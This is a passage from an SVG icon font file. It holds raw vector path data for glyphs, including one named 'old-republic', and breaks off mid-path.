c-1.33008 1.50977 -5.5 10.8896 -5.99023 13.4902c-0.310547 1.66016 -0.0898438 2.66992 0.870117 3.89941c2.22949 2.86035 3.39941 5.68066 4.4502 10.7305c2.33008 11.1904 7.73926 26.0898 10.5996 29.2197c3.17969 3.4707 7.7002 1.0498 9.41016 -5.0293
c1.33984 -4.79004 1.37012 -9.79004 0.0996094 -18.5508c-0.529297 -3.67969 -0.979492 -8.67969 -0.990234 -11.1094c-0.0195312 -4.01074 0.19043 -4.69043 2.25 -7.39062c3.33008 -4.37012 7.73047 -7.40918 15.2002 -10.5195
c1.7002 -0.709961 3.82031 -1.99023 4.7207 -2.85059c11.1699 -10.7197 18.6191 -16.1797 22.9492 -16.8496c5.18066 -0.799805 7.98047 -4.54004 10.04 -13.3896c1.31055 -5.65039 4 -11.1406 5.45996 -11.1406c0.59082 0 2.09082 0.629883 3.33008 1.39062
c1.98047 1.21973 2.25 1.72949 2.25 4.17969c-0.00976562 3.70996 -1.16992 14.0801 -2 17.8398c-0.370117 1.66016 -0.779297 4.06055 -0.929688 5.35059c-0.139648 1.29004 -0.610352 3.84961 -1.03027 5.68945c-2.5498 11.1602 -3.64941 15.46 -4.09961 16.0498
c-1.5498 2.02051 -4.08008 10.2002 -4.92969 15.9199c-1.64062 11.1104 -3.96094 14.2305 -12.9102 17.3906c-4.64062 1.63965 -8.89062 4.12012 -13.3203 7.78027c-1.15039 0.949219 -4.00977 3.21973 -6.34961 5.05957
c-2.35059 1.83008 -4.41016 3.53027 -4.60059 3.75977c-0.179688 0.230469 -1.38965 1.14062 -2.68945 2.02051c-6.24023 4.21973 -8.84082 6.97949 -11.2607 11.96l-2.43945 5.01953l-0.219727 12.9805l-0.220703 12.9795l6.91016 6.5498
c3.9502 3.75 8.48047 7.35059 10.5898 8.43066c3.31055 1.68945 4.4502 1.88965 11.3701 2.0498c8.53027 0.19043 10.1201 -0.0205078 11.6602 -1.55957c1.53027 -1.53027 1.36035 -6.40039 -0.290039 -8.5c-0.740234 -0.94043 -1.33984 -1.98047 -1.33984 -2.32031
c0 -0.580078 -2.61035 -4.91016 -5.41992 -8.99023c-0.680664 -0.990234 -2.12988 -5.34961 -2.37012 -6.82031c20.4395 -13.3896 21.5498 -3.76953 14.0703 -28.9795l11.3994 -2.54004c3.11035 8.66016 6.46973 17.2598 8.61035 26.2197
c0.290039 7.62988 -11.9805 4.19043 -15.4004 8.68066c-2.33008 5.92969 3.12988 14.1797 6.06055 19.1992c1.59961 2.33984 6.62012 4.7002 8.81934 4.15039c0.879883 -0.219727 4.16016 0.349609 7.37012 1.28027c3.18066 0.919922 6.58008 1.67969 7.5498 1.67969
c0.970703 0 3.66016 0.580078 5.98047 1.29004c3.65039 1.11035 4.5 1.16992 6.34961 0.400391c1.16992 -0.480469 3.79004 -1.09082 5.82031 -1.36035c2.02051 -0.259766 4.71973 -1.12012 6 -1.91016s3.53027 -1.76953 5.02051 -2.16992
c2.50977 -0.679688 3 -0.570312 7.0498 1.66992l4.34961 2.40039l10.7002 0.40918c10.4395 0.400391 10.8096 0.470703 15.2598 2.68066l4.58008 2.2998l2.45996 -1.42969c1.75977 -1.02051 3.13965 -2.73047 4.85059 -5.98047
c2.35938 -4.50977 2.37988 -4.58008 1.36914 -7.37012c-0.879883 -2.43945 -0.889648 -3.2998 -0.0996094 -6.38965c0.5 -1.95996 1.4502 -4.62012 2.09961 -5.91016c0.650391 -1.29004 1.24023 -3.08984 1.31055 -4.00977
c0.30957 -4.33008 -0.0302734 -5.2998 -2.41016 -6.91992c-2.16992 -1.4707 -6.98047 -7.91016 -6.98047 -9.33984c0 -0.320312 -0.479492 -1.69043 -1.06934 -3.03027c-5.04004 -11.5098 -6.75977 -13.5605 -14.2598 -16.9805
c-9.2002 -4.19922 -12.3008 -5.18945 -16.21 -5.18945c-3.10059 0 -4 -0.25 -4.54004 -1.25977c-0.370117 -0.69043 -2.20996 -2.37012 -4.09082 -3.70996c-2.04004 -1.4707 -3.7998 -3.38086 -4.37988 -4.78027c-0.540039 -1.28027 -1.66016 -2.58984 -2.48926 -2.91016
c-0.830078 -0.320312 -1.94043 -1.08008 -2.4502 -1.70996c-0.520508 -0.620117 -3.66016 -3.04004 -7 -5.37988c-3.33008 -2.33984 -6.87012 -5.02051 -7.87012 -5.95996c-1 -0.94043 -2.07031 -1.70996 -2.39062 -1.70996
c-0.319336 0 -1.2793 -0.740234 -2.12988 -1.65039c-1.30957 -1.38965 -1.48926 -2.11035 -1.13965 -4.59961c0.219727 -1.62988 0.860352 -4.27051 1.41992 -5.87988c1.32031 -3.80078 1.31055 -7.86035 -0.0498047 -10.5703
c-1.42969 -2.86035 -0.889648 -6.65039 1.34961 -9.58984c2.01074 -2.62988 2.16016 -4.56055 0.709961 -8.83984c-0.609375 -1.80078 -1.0498 -5.4502 -1.05957 -8.91016c-0.0205078 -4.87988 0.219727 -6.28027 1.45996 -8.37988
c1.2002 -2.04004 1.82031 -2.48047 3.24023 -2.32031c1.97949 0.229492 2.2998 1.0498 4.70996 12.1201c2.17969 10.0303 3.70996 11.9199 13.7598 17.0801c2.94043 1.50977 7.45996 3.95996 10.0303 5.43945c2.58008 1.48047 6.79004 3.69043 9.37012 4.91016
c6.66992 3.16016 11.0498 6.52051 15.2197 11.6699c7.10938 8.79004 9.97949 16.2207 12.8496 33.2998c0.549805 3.28027 1.43066 5.65039 2.86035 7.73047c1.29004 1.87012 2.37012 4.62012 2.88965 7.30957c1.02051 5.30078 2.85059 9.08008 5.58008 11.5107
c4.7002 4.17969 6 1.08984 4.58984 -10.8701c-0.459961 -3.86035 -1.09961 -10.3301 -1.43945 -14.3799l-0.610352 -7.36035l4.4502 -4.08984l4.4502 -4.08984l0.109375 -8.41992c0.0605469 -4.63086 0.470703 -9.53027 0.919922 -10.8906l0.820312 -2.46973
l-6.42969 -6.28027c-8.54004 -8.33008 -12.8799 -13.9297 -16.7598 -21.6094c-1.77051 -3.49023 -3.74023 -7.11035 -4.38086 -8.03027c-2.17969 -3.11035 -6.45996 -13.0098 -8.75977 -20.2598l-2.29004 -7.2207l-6.96973 -6.48926
c-3.83008 -3.57031 -7.95996 -7.25 -9.16992 -8.16992c-3.0498 -2.32031 -4.25977 -5.15039 -4.25977 -9.99023c0 -2.98047 0.429688 -4.95996 1.58984 -7.25977c0.870117 -1.74023 1.80957 -3.91016 2.08984 -4.83008s0.979492 -2.2207 1.57031 -2.89062
c1.39941 -1.58984 1.91992 -16.1201 0.830078 -23.2197c-0.680664 -4.48047 -3.63086 -12.0205 -4.7002 -12.0205c-1.79004 0 -4.06055 -9.26953 -5.07031 -20.7393c-0.179688 -2.02051 -0.620117 -5.94043 -0.979492 -8.7002
c-0.360352 -2.75977 -0.959961 -9.98047 -1.35059 -16.0498c-0.769531 -12.2207 -0.189453 -18.7705 2.0498 -23.1504c3.41016 -6.68945 0.520508 -12.6895 -11.0293 -22.8398l-3.9707 -3.49023l0.0703125 -5.18945c0.0400391 -2.86035 0.549805 -6.85059 1.13965 -8.87012
c4.61035 -15.9805 4.73047 -16.9199 4.38086 -37.1299c-0.460938 -26.4004 -0.260742 -40.2705 0.629883 -44.1504c0.419922 -1.83984 0.90918 -5 1.08008 -7.01953c0.169922 -2.02051 0.65918 -5.33008 1.0791 -7.36035
c0.470703 -2.25977 0.780273 -11.0205 0.790039 -22.7402l0.0205078 -19.0596l-1.81055 -2.62988c-2.70996 -3.91016 -15.1094 -13.54 -15.4893 -12.29zM232.81 -18.7803c-0.179688 0.299805 -0.329102 6.87012 -0.329102 14.5898
c0 14.0605 -0.890625 27.54 -2.26074 34.4502c-0.399414 2.02051 -0.80957 9.7002 -0.899414 17.0605c-0.150391 11.9297 -1.40039 24.3701 -2.64062 26.3799c-0.660156 1.06934 -3.01953 17.6602 -3.0293 21.2998c-0.0107422 4.23047 1.01953 6 5.2793 9.12988
c4.14062 3.04004 4.86035 3.13965 5.48047 0.719727c0.280273 -1.09961 1.4502 -5.61914 2.59961 -10.0293c3.93066 -15.1201 4.14062 -16.2705 4.0498 -21.7402c-0.0996094 -5.78027 -0.129883 -6.12988 -1.73926 -17.7305
c-0.980469 -7.06934 -1.16992 -12.3896 -1.04004 -28.4297c0.169922 -19.4004 -0.640625 -35.7295 -2.04004 -41.2695c-0.709961 -2.78027 -2.7998 -5.48047 -3.43066 -4.43066zM161.82 18.7998c-0.240234 0.379883 -1.01074 5.24023 -1.73047 10.79
c-0.719727 5.56055 -1.49023 10.4102 -1.72949 10.79c-0.230469 0.379883 -0.680664 3.2998 -0.990234 6.49023c-0.310547 3.18945 -0.910156 7.45996 -1.33008 9.47949c-0.990234 4.79004 -3.34961 19.3506 -3.41992 21.0703
c-0.0302734 0.740234 -0.339844 4.0498 -0.700195 7.36035c-0.669922 6.20996 -0.839844 27.6699 -0.219727 28.29c0.959961 0.959961 6.62988 -2.76074 11.3301 -7.43066l5.2793 -5.25l-0.449219 -6.46973c-0.25 -3.55957 -0.600586 -10.2295 -0.780273 -14.8301
c-0.179688 -4.59961 -0.490234 -9.87012 -0.669922 -11.71s-0.610352 -9.36035 -0.94043 -16.7197c-0.790039 -17.4102 -1.93945 -31.29 -2.64941 -32c-0.320312 -0.299805 -0.760742 -0.240234 -1 0.139648zM74.6299 285.39
c21.0703 -12.79 17.8398 -14.1494 28.4902 -17.6592c13.0098 -4.29004 18.8701 -7.13086 23.1494 -16.8701c-43.6592 -36.1406 -69.0098 -57.9004 -76.71 -70.8203c-31.0195 -52.0098 -5.98926 -101.59 62.75 -87.21c-14.1797 -29.2305 -77.9697 -28.6299 -98.6797 4.90039
c-24.6797 39.9492 -22.0898 118.3 61 187.659zM285.42 106.37c56.6602 -6.87988 82.3203 37.7402 46.54 89.2295c0 0 -26.8701 29.3408 -64.2803 67.96c2.98047 15.4502 9.49023 32.1201 30.5703 53.8203c89.2002 -63.5098 92 -141.61 92.46 -149.36
c4.27051 -70.5791 -78.6602 -91.1191 -105.29 -61.6494z" />
    <glyph glyph-name="old-republic" unicode="&#xf510;" horiz-adv-x="496" 
d="M235.76 437.77c7.5 0.310547 15 0.280273 22.5 0.0908203c3.61035 -0.140625 7.2002 -0.400391 10.79 -0.730469c4.91992 -0.269531 9.79004 -1.03027 14.6699 -1.62012c2.93066 -0.429688 5.83008 -0.979492 8.75 -1.45996
c7.90039 -1.33008 15.6699 -3.28027 23.3906 -5.39941c12.2393 -3.4707 24.1895 -7.91992 35.7598 -13.21c26.5596 -12.2402 50.9395 -29.21 71.6299 -49.8809c20.0303 -20.0898 36.7197 -43.5498 48.8896 -69.1895c1.12988 -2.58984 2.44043 -5.10059 3.4707 -7.74023
c2.80957 -6.42969 5.38965 -12.9697 7.58008 -19.6299c4.13965 -12.3301 7.33984 -24.9902 9.41992 -37.8301c0.569336 -3.13965 1.04004 -6.2998 1.39941 -9.46973c0.549805 -3.83008 0.94043 -7.69043 1.18066 -11.5605
c0.829102 -8.33984 0.839844 -16.7295 0.769531 -25.0996c-0.0703125 -4.96973 -0.259766 -9.94043 -0.75 -14.8896c-0.240234 -3.38086 -0.509766 -6.76074 -0.979492 -10.1201c-0.390625 -2.7207 -0.630859 -5.45996 -1.11035 -8.16992
c-0.900391 -5.15039 -1.7002 -10.3105 -2.87012 -15.4102c-4.09961 -18.5 -10.2998 -36.5498 -18.5098 -53.6299c-15.7705 -32.8301 -38.8301 -62.1699 -67.1201 -85.1201c-14.3926 -11.7676 -39.8887 -27.3848 -56.9102 -34.8604
c-6.20996 -2.67969 -12.46 -5.25 -18.8701 -7.41016c-3.50977 -1.16016 -7.00977 -2.37988 -10.5703 -3.38965c-6.61914 -1.87988 -13.2891 -3.63965 -20.0391 -5c-4.66016 -0.910156 -9.34082 -1.73047 -14.0303 -2.48047c-5.25 -0.65918 -10.5 -1.43945 -15.79 -1.73926
c-6.69043 -0.660156 -13.4102 -0.839844 -20.1201 -0.810547c-6.82031 -0.0292969 -13.6504 0.120117 -20.4502 0.790039c-3.29004 0.230469 -6.57031 0.5 -9.83008 0.950195c-2.71973 0.389648 -5.45996 0.629883 -8.16992 1.11035
c-4.12012 0.719727 -8.25 1.37012 -12.3496 2.21973c-4.25 0.939453 -8.49023 1.88965 -12.6904 3.01953c-8.62988 2.16992 -17.0801 5.01074 -25.4102 8.13086c-10.4893 4.11914 -20.79 8.75 -30.6396 14.25c-2.13965 1.14941 -4.28027 2.28906 -6.34961 3.56934
c-11.2207 6.58008 -21.8604 14.1006 -31.9199 22.3398c-34.6807 28.4102 -61.4102 66.4307 -76.3506 108.7c-3.08984 8.74023 -5.70996 17.6504 -7.7998 26.6797c-1.48047 6.16016 -2.52051 12.4209 -3.58008 18.6602
c-0.400391 2.35059 -0.610352 4.73047 -0.950195 7.08984c-0.599609 3.96094 -0.75 7.96094 -1.16992 11.9404c-0.799805 9.46973 -0.709961 18.9902 -0.509766 28.4902c0.139648 3.50977 0.339844 7.00977 0.700195 10.5098
c0.30957 3.16992 0.459961 6.37012 0.919922 9.52051c0.410156 2.80957 0.649414 5.64941 1.16016 8.43945c0.699219 3.94043 1.2998 7.90039 2.11914 11.8203c3.43066 16.5195 8.4707 32.7295 15.2607 48.1797c1.14941 2.91992 2.58984 5.71973 3.85938 8.58984
c8.05078 16.71 17.9004 32.5605 29.4902 47.0605c20 25.3799 45.1006 46.6797 73.2705 62.4697c7.5 4.15039 15.1592 8.0498 23.0693 11.3701c15.8203 6.87988 32.4102 11.9502 49.3105 15.3799c3.50977 0.669922 7.04004 1.24023 10.5596 1.84961
c2.62012 0.470703 5.28027 0.700195 7.91016 1.08008c3.53027 0.530273 7.09961 0.680664 10.6504 1.04004c2.45996 0.240234 4.90918 0.360352 7.35938 0.509766zM244.4 413.36c-9.23047 -0.100586 -18.4307 -0.990234 -27.5703 -2.23047
c-7.2998 -1.08008 -14.5303 -2.59961 -21.71 -4.2998c-13.9102 -3.5 -27.4805 -8.33984 -40.46 -14.4199c-10.46 -4.99023 -20.5898 -10.7002 -30.1797 -17.2197c-4.18066 -2.9209 -8.40039 -5.80078 -12.3408 -9.03027
c-5.08008 -3.96973 -9.97949 -8.16992 -14.6797 -12.5898c-2.50977 -2.24023 -4.80957 -4.7002 -7.21973 -7.06055c-28.2207 -28.79 -48.4404 -65.3896 -57.5 -104.689c-2.04004 -8.44043 -3.54004 -17.0205 -4.44043 -25.6504
c-1.09961 -8.88965 -1.43945 -17.8496 -1.41016 -26.7998c0.110352 -7.13965 0.379883 -14.2803 1.2207 -21.3701c0.620117 -7.12012 1.87012 -14.1602 3.19922 -21.1797c1.07031 -4.65039 2.03027 -9.32031 3.33008 -13.9102
c6.29004 -23.3799 16.5 -45.7002 30.0703 -65.75c8.63965 -12.9805 18.7803 -24.9297 29.9805 -35.7705c16.2793 -15.8193 35.0498 -29.04 55.3398 -39.2197c7.2793 -3.51953 14.6602 -6.87012 22.2695 -9.62988c5.04004 -1.75977 10.0605 -3.57031 15.2197 -4.98047
c11.2607 -3.22949 22.7705 -5.59961 34.3906 -7.05957c2.91016 -0.290039 5.80957 -0.610352 8.71973 -0.900391c13.8203 -1.08008 27.7402 -1 41.54 0.430664c4.4502 0.599609 8.91992 0.989258 13.3496 1.7793c3.63086 0.670898 7.28027 1.25 10.8701 2.10059
c4.12988 0.979492 8.28027 1.91016 12.3604 3.07031c26.5 7.33984 51.5801 19.71 73.5801 36.1992c15.7803 11.8203 29.96 25.7607 42.1201 41.2803c3.25977 4.02051 6.16992 8.30957 9.12988 12.5498c3.38965 5.06055 6.58008 10.25 9.59961 15.54
c2.40039 4.44043 4.74023 8.91016 6.9502 13.4502c5.69043 12.0498 10.2803 24.6201 13.75 37.4902c2.58984 10.0098 4.75 20.1602 5.90039 30.4502c1.76953 13.4697 1.93945 27.0996 1.29004 40.6494c-0.290039 3.89062 -0.669922 7.77051 -1 11.6602
c-2.23047 19.0801 -6.79004 37.9102 -13.8203 55.7998c-5.9502 15.1299 -13.5303 29.6299 -22.6104 43.1299c-12.6895 18.8008 -28.2393 35.6807 -45.9697 49.8301c-25.0498 20 -54.4697 34.5498 -85.6504 42.0801c-7.7793 1.92969 -15.6895 3.33984 -23.6299 4.4502
c-3.90918 0.589844 -7.84961 0.820312 -11.7695 1.24023c-7.38965 0.569336 -14.8105 0.719727 -22.2197 0.580078zM139.26 364.47c13.2998 8.89062 28.0801 15.3799 43.2998 20.1807c-3.16992 -1.77051 -6.43945 -3.38086 -9.5293 -5.29004
c-11.21 -6.68066 -21.5205 -14.9004 -30.3799 -24.4902c-6.80078 -7.42969 -12.7607 -15.7305 -17.0107 -24.8896c-3.29004 -6.86035 -5.63965 -14.1904 -6.85938 -21.7109c-0.930664 -4.84961 -1.2998 -9.80957 -1.16992 -14.75
c0.129883 -13.6592 4.43945 -27.0791 11.29 -38.8193c5.91992 -10.2197 13.6299 -19.3301 22.3594 -27.2598c4.85059 -4.36035 10.2402 -8.09082 14.9502 -12.6006c2.25977 -2.18945 4.49023 -4.41992 6.42969 -6.91016c2.62012 -3.30957 4.89062 -6.98926 5.99023 -11.0996
c0.900391 -3.02051 0.660156 -6.2002 0.69043 -9.31055c0.0195312 -4.09961 -0.0400391 -8.19922 0.0292969 -12.2998c0.140625 -3.54004 -0.0195312 -7.08984 0.110352 -10.6299c0.0800781 -2.37988 0.0205078 -4.75977 0.0498047 -7.13965
c0.160156 -5.77051 0.0605469 -11.5303 0.150391 -17.2998c0.109375 -2.91016 0.0195312 -5.82031 0.129883 -8.74023c0.0302734 -1.62988 0.129883 -3.28027 -0.0302734 -4.91016c-0.910156 -0.120117 -1.81934 -0.179688 -2.72949 -0.160156
c-10.9902 0 -21.8799 2.62988 -31.9502 6.92969c-6 2.7002 -11.8105 5.89062 -17.0898 9.83008c-5.75 4.19043 -11.0898 8.95996 -15.79 14.3105c-6.53027 7.24023 -11.9805 15.3896 -16.6201 23.9502c-1.07031 2.0293 -2.24023 4.01953 -3.17969 6.12012
c-1.16016 2.63965 -2.62012 5.13965 -3.66992 7.81934c-4.05078 9.68066 -6.57031 19.9404 -8.08008 30.3105c-0.490234 4.43945 -1.09082 8.87988 -1.2002 13.3496c-0.700195 15.7305 0.839844 31.5498 4.66992 46.8203c2.12012 8.14941 4.76953 16.1797 8.30957 23.8301
c6.32031 14.1992 15.3398 27.1797 26.3008 38.1895c6.2793 6.2002 13.1299 11.8398 20.5293 16.6699zM314.63 384.59c2.74023 -0.740234 5.41016 -1.74023 8.08984 -2.67969c6.36035 -2.33008 12.6807 -4.83984 18.71 -7.95996
c13.1104 -6.44043 25.3105 -14.8105 35.8203 -24.9697c10.2002 -9.9502 18.7402 -21.6006 25.1396 -34.3408c1.28027 -2.75 2.64062 -5.45996 3.81055 -8.25977c6.30957 -15.0996 10 -31.2598 11.2295 -47.5703c0.410156 -4.54004 0.44043 -9.08984 0.450195 -13.6396
c0.0703125 -11.6396 -1.49023 -23.25 -4.2998 -34.5303c-1.96973 -7.26953 -4.34961 -14.4893 -7.86035 -21.1797c-3.17969 -6.63965 -6.67969 -13.1602 -10.8398 -19.2402c-6.93945 -10.4697 -15.5996 -19.8701 -25.8203 -27.2197
c-10.4795 -7.63965 -22.6396 -13.0195 -35.3994 -15.3799c-3.50977 -0.69043 -7.08008 -1.08008 -10.6602 -1.20996c-1.84961 -0.0605469 -3.71973 -0.160156 -5.55957 0.0996094c-0.280273 2.15039 0 4.31055 -0.0107422 6.45996
c-0.0292969 3.73047 0.140625 7.4502 0.100586 11.1699c0.189453 7.02051 0.0195312 14.0508 0.209961 21.0703c0.0292969 2.37988 -0.0302734 4.75977 0.0292969 7.13965c0.170898 5.07031 -0.0390625 10.1406 0.140625 15.21
c0.0996094 2.99023 -0.240234 6.04004 0.509766 8.95996c0.660156 2.5 1.78027 4.86035 3.08984 7.08008c4.45996 7.31055 11.0605 12.96 17.6807 18.2607c5.37988 4.17969 10.4697 8.76953 15.0195 13.8398c7.67969 8.37012 14.1699 17.8799 18.7803 28.2695
c2.5 5.93066 4.51953 12.1006 5.5498 18.46c0.860352 4.37012 1.05957 8.83008 1.00977 13.2705c-0.0195312 7.84961 -1.39941 15.6494 -3.63965 23.1699c-1.75 5.72949 -4.27051 11.1797 -7.08984 16.4502c-3.87012 6.92969 -8.65039 13.3096 -13.96 19.1992
c-9.94043 10.8506 -21.75 19.9404 -34.6006 27.1006c-1.84961 1.01953 -3.83984 1.82031 -5.62988 2.96973zM213.83 326.14c0.979492 1.18066 1.99023 2.33008 3.12012 3.37988c-0.610352 -0.929688 -1.27051 -1.80957 -1.9502 -2.67969
c-3.09961 -3.87988 -5.54004 -8.30957 -7.03027 -13.0596c-0.870117 -3.27051 -1.67969 -6.60059 -1.72949 -10c-0.0703125 -2.52051 -0.0800781 -5.07031 0.319336 -7.57031c1.13086 -7.62988 4.33008 -14.8496 8.77051 -21.1201c2 -2.7002 4.25 -5.26953 6.91992 -7.33008
c1.62012 -1.26953 3.53027 -2.08984 5.33984 -3.0498c3.11035 -1.67969 6.32031 -3.22949 9.07031 -5.47949c2.66992 -2.09082 4.5498 -5.33008 4.39941 -8.79004c-0.00976562 -73.6709 0 -147.341 -0.00976562 -221.021c0 -1.34961 -0.0800781 -2.7002 0.0400391 -4.04004
c0.129883 -1.47949 0.820312 -2.83008 1.46973 -4.14941c0.860352 -1.66016 1.78027 -3.34082 3.18066 -4.62012c0.849609 -0.770508 1.96973 -1.40039 3.14941 -1.24023c1.5 0.200195 2.66016 1.34961 3.4502 2.57031c0.959961 1.50977 1.67969 3.15918 2.28027 4.84961
c0.759766 2.12988 0.439453 4.41992 0.540039 6.62988c0.139648 4.03027 -0.0205078 8.06055 0.139648 12.0898c0.0302734 5.89062 0.0302734 11.7705 0.0605469 17.6602c0.139648 3.62012 0.0292969 7.24023 0.109375 10.8604
c0.150391 4.0293 -0.0195312 8.05957 0.140625 12.0898c0.0292969 5.99023 0.0292969 11.9795 0.0693359 17.9697c0.140625 3.62012 0.0205078 7.24023 0.110352 10.8604c0.139648 3.92969 -0.0205078 7.85938 0.139648 11.7803
c0.0302734 5.98926 0.0302734 11.9795 0.0605469 17.9697c0.160156 3.93945 -0.00976562 7.87988 0.189453 11.8193c0.290039 -1.43945 0.129883 -2.91992 0.220703 -4.37988c0.189453 -3.60938 0.419922 -7.22949 0.759766 -10.8398
c0.320312 -3.43945 0.439453 -6.88965 0.859375 -10.3193c0.370117 -3.10059 0.510742 -6.2207 0.950195 -9.31055c0.570312 -4.08984 0.870117 -8.20996 1.54004 -12.29c1.45996 -9.04004 2.83008 -18.1104 5.08984 -26.9902c1.13086 -4.81934 2.40039 -9.60938 4 -14.2998
c2.54004 -7.89941 5.7207 -15.6699 10.3105 -22.6201c1.72949 -2.63965 3.87012 -4.97949 6.09961 -7.20996c0.270508 -0.25 0.549805 -0.509766 0.879883 -0.709961c0.600586 -0.25 1.31055 0.0703125 1.7002 0.570312c0.709961 0.879883 1.16992 1.93945 1.7002 2.92969
c4.0498 7.7998 8.17969 15.5605 12.3398 23.3105c0.700195 1.30957 1.44043 2.62012 2.56055 3.60938c1.75 1.57031 3.83984 2.69043 5.97949 3.62988c2.87988 1.2207 5.90039 2.19043 9.03027 2.41992c6.58008 0.620117 13.1094 -0.75 19.5596 -1.84961
c3.69043 -0.580078 7.40039 -1.16992 11.1299 -1.41016c3.74023 -0.0996094 7.48047 -0.0498047 11.21 0.280273c8.55078 0.919922 16.9902 2.95996 24.9404 6.25c5.2998 2.24023 10.46 4.83008 15.3096 7.92969c11.46 7.20996 21.46 16.5703 30.04 27.0107
c1.16992 1.41992 2.25 2.89941 3.45996 4.2793c-1.19922 -3.24023 -2.66992 -6.37012 -4.15918 -9.47949c-1.25 -2.90039 -2.84082 -5.61035 -4.27051 -8.41992c-5.16016 -9.62988 -11.0195 -18.9102 -17.75 -27.5205
c-4.03027 -5.20996 -8.53027 -10.0498 -13.3301 -14.5703c-6.63965 -6.0498 -14.0703 -11.3691 -22.4297 -14.7598c-8.20996 -3.37012 -17.3105 -4.62988 -26.0898 -3.29004c-3.56055 0.580078 -7.01074 1.69043 -10.4102 2.87988
c-2.79004 0.970703 -5.39062 2.38086 -8.03027 3.69043c-3.42969 1.70996 -6.63965 3.80957 -9.70996 6.08008c2.70996 -3.06055 5.69043 -5.86035 8.7002 -8.61035c4.26953 -3.75977 8.74023 -7.30957 13.6299 -10.2295c3.98047 -2.4502 8.29004 -4.40039 12.8398 -5.51074
c1.45996 -0.369141 2.95996 -0.459961 4.4502 -0.599609c-1.25 -1.09961 -2.62988 -2.04004 -3.99023 -2.97949c-9.60938 -6.54004 -20.0098 -11.8604 -30.6895 -16.4307c-20.8604 -8.7002 -43.1699 -13.9697 -65.7402 -15.3398
c-4.66016 -0.240234 -9.32031 -0.360352 -13.9805 -0.360352c-4.97949 0.110352 -9.96973 0.130859 -14.9199 0.650391c-11.2002 0.759766 -22.29 2.73047 -33.1699 5.42969c-10.3496 2.70996 -20.5498 6.12012 -30.2998 10.5508
c-8.70996 3.85938 -17.1201 8.41992 -24.9902 13.79c-1.83008 1.30957 -3.74023 2.5293 -5.37012 4.0791c6.60059 1.19043 13.0303 3.39062 18.9902 6.48047c5.74023 2.86035 10.9902 6.66016 15.6299 11.0703c2.24023 2.18945 4.29004 4.58984 6.19043 7.08984
c-3.43066 -2.12988 -6.93066 -4.15039 -10.6201 -5.78027c-4.41016 -2.16016 -9.07031 -3.76953 -13.8105 -5.01953c-5.72949 -1.52051 -11.7393 -1.73047 -17.6094 -1.14062c-8.12988 0.950195 -15.8604 4.27051 -22.5098 8.98047
c-4.32031 2.93945 -8.2207 6.42969 -11.96 10.0596c-9.93066 10.1602 -18.2002 21.8105 -25.6602 33.8604c-3.94043 6.26953 -7.53027 12.75 -11.1201 19.2197c-1.0498 2.04004 -2.15039 4.0498 -3.17969 6.10059c2.84961 -2.9209 5.56934 -5.9707 8.42969 -8.88086
c8.99023 -8.96973 18.5596 -17.4395 29.1602 -24.4795c7.5498 -4.90039 15.6699 -9.23047 24.5596 -11.0303c3.11035 -0.729492 6.32031 -0.469727 9.46973 -0.80957c2.77051 -0.280273 5.56055 -0.200195 8.34082 -0.299805
c5.0498 -0.0605469 10.1094 -0.0400391 15.1592 0.15918c3.65039 0.160156 7.27051 0.660156 10.8906 1.09082c2.06934 0.25 4.10938 0.709961 6.13965 1.19922c3.87988 0.950195 8.11035 0.959961 11.8301 -0.609375c4.75977 -1.85059 8.44043 -5.64062 11.3799 -9.70996
c2.16016 -3.02051 4.06055 -6.2207 5.66016 -9.58008c1.16016 -2.43066 2.45996 -4.79004 3.5498 -7.26074c1 -2.23926 2.15039 -4.41992 3.41992 -6.51953c0.669922 -1.01953 1.40039 -2.15039 2.62012 -2.5498c1.06055 0.75 1.70996 1.91016 2.28027 3.03027
c2.09961 4.15918 3.41992 8.64941 4.88965 13.0498c2.02051 6.58984 3.78027 13.2695 5.19043 20.0195c2.20996 9.25 3.25 18.7197 4.54004 28.1299c0.55957 3.98047 0.830078 7.99023 1.30957 11.9707c0.870117 10.6396 1.90039 21.2695 2.24023 31.9395
c0.0800781 1.86035 0.240234 3.70996 0.25 5.57031c0.00976562 4.34961 0.25 8.68945 0.219727 13.0303c-0.00976562 2.37988 -0.00976562 4.75977 0 7.12988c0.0498047 5.06934 -0.200195 10.1396 -0.219727 15.21c-0.200195 6.60938 -0.709961 13.2002 -1.29004 19.7793
c-0.730469 5.88086 -1.5498 11.7803 -3.12012 17.5107c-2.0498 7.75 -5.58984 15.0293 -9.7998 21.8193c-3.16016 5.07031 -6.79004 9.87988 -11.0898 14.0303c-3.87988 3.86035 -8.58008 7.08008 -13.9404 8.4502c-1.5 0.410156 -3.05957 0.450195 -4.58984 0.639648
c0.0703125 2.99023 0.700195 5.93066 1.25977 8.85059c1.58984 7.70996 3.7998 15.2998 6.76074 22.5996c1.51953 4.03027 3.40918 7.90039 5.38965 11.7197c3.4502 6.56055 7.62012 12.79 12.46 18.46zM245.1 324.44
c0.350586 0.0595703 0.709961 0.119141 1.07031 0.189453c0.19043 -1.79004 0.0898438 -3.58008 0.0996094 -5.37012v-38.1299c-0.00976562 -1.74023 0.130859 -3.49023 -0.149414 -5.21973c-0.360352 0.0302734 -0.709961 0.0498047 -1.06055 0.0498047
c-0.949219 3.75 -1.71973 7.5498 -2.61914 11.3096c-0.380859 1.53027 -0.580078 3.09082 -1.07031 4.59082c-1.7002 0.239258 -3.42969 0.169922 -5.15039 0.199219c-5.05957 0.0107422 -10.1299 0 -15.1895 0.0107422
c-1.66016 0.00976562 -3.32031 -0.0898438 -4.98047 0.0292969c-0.0302734 0.390625 -0.259766 0.910156 0.160156 1.18066c1.28027 0.649414 2.71973 0.879883 4.05957 1.34961c3.43066 1.13965 6.88086 2.16016 10.3105 3.31055
c1.38965 0.479492 2.90039 0.719727 4.16016 1.54004c0.0400391 0.55957 0.0195312 1.12988 -0.0498047 1.67969c-1.23047 0.549805 -2.53027 0.870117 -3.81055 1.28027c-3.12988 1.0293 -6.29004 1.95996 -9.41016 3.01953c-1.79004 0.620117 -3.66992 1 -5.41016 1.79004
c-0.0292969 0.370117 -0.0693359 0.730469 -0.109375 1.08984c5.08984 0.19043 10.2002 -0.0595703 15.2998 0.120117c3.36035 0.129883 6.73047 -0.0800781 10.0898 0.0703125c0.120117 0.389648 0.259766 0.769531 0.370117 1.16016
c1.08008 4.93945 2.33008 9.8291 3.38965 14.75zM251.07 324.64c0.359375 -0.0498047 0.719727 -0.120117 1.08008 -0.199219c0.979492 -3.85059 1.72949 -7.76074 2.70996 -11.6104c0.359375 -1.41992 0.55957 -2.87988 1.0293 -4.27051
